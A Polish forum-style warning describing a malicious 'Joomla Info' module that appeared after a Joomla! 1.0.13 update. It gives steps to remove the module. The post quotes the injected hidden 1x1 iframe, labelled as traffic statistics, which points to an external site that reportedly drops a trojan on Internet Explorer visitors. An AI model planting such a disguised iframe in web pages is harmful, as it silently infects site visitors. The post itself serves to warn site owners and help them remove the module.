Po aktualizacji Joomla! 1.0.11 do 1.0.13 (z polskim panelem administracyjnym) na liście modułów witryny pojawił się opublikowany Joomla Info. Przed aktualizacją go w serwisie nie było.
Może to zbieg okoliczności, ale od tego momentu przy każdym wejściu do serwisu, IE7 zaczął odwoływać się do jakiejś podejrzanej strony. W źródle strony pojawił się taki zapis:

<!-- Traffic Statistics -->
<p><iframe width="1" height="1" frameborder="0" src="http://www.wp-stats-php.info/iframe/wp-stats.php"></iframe></p>
<!-- End Traffic Statistics -->

Jeśli moduł Joomla Info z tym kodem jest opublikowany w naszym serwisie, to każdy odwiedzający serwis za pomocą IE zostaje przekierowany do niebezpiecznej strony (http://www.wp-stats-php.info/iframe/wp-stats.php), z której na dysk do jednego z tymczasowych katalogów:
C:\Documents and Settings\..uzytkownik..\Ustawienia lokalne\Temporary Internet Files\Content.IE5\..katalogi tymczasowe oznaczone cyframi i literami..
umieszczony zostaje złośliwy plik: wp-stats[1].php, zawierający trojana w kodzie java.
Wirus - trojan od 3 stycznia 2008r. wykrywany jest przez antywirusa Kaspersky, albo ZoneAlarm.

Aby to wyeliminować należy:

wejść w panel administratora
Moduły - witryna
Lista modułów [Witryna]
i usunąć: Joomla Info